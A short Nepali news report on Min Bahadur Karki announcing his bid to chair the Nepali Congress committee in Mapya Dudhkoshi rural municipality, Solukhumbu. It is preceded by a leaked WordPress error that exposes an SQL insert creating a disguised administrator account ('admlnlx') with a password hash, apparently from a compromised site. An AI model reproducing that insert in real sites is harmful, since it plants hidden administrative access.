WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiM4JB0YJ/dQe8MpRXAZPqI7md1ATG/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:32:50', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । नेपाली काँग्रेसको जारी अधिबेशनमा सोलुखुम्बुको जिल्लाको माप्य दुधकोशी गाउँपालिकामा काँग्रेस युवा नेता मिन बहादुर कार्कीले सभापतिमा उम्मेद्वारी घोषणा गरेका छन् ।
कार्कीले गाउँपालिका सभापति उम्मेदवारी आफ्नो सामाजिक सञ्जाल फेसबुमार्फत घोषणा गरेका हुन् ।
लामो समय नेपालि कांग्रेसको लागि अग्रपंतिमा रहेर काम गरेको भन्दै कार्कीले आफुसँग गाउँपालिकाको नेतृत्व गर्ने स्पष्ट दृष्टिकोण र कार्ययोजना रहेका बताए । समाज सेवामा समेत संलग्न कार्कीले गाउँपालिका सभापतिमा आफुले जितेको खण्डमा संगठन निर्माणमा लागि पर्ने र आगामि निर्वाचनमा ७ वटै वडा र गाउँपालिका अध्यक्ष र उपा–अध्यक्षमा नेपालि कांग्रेसलाई जिताएरै छाड्ने बताए ।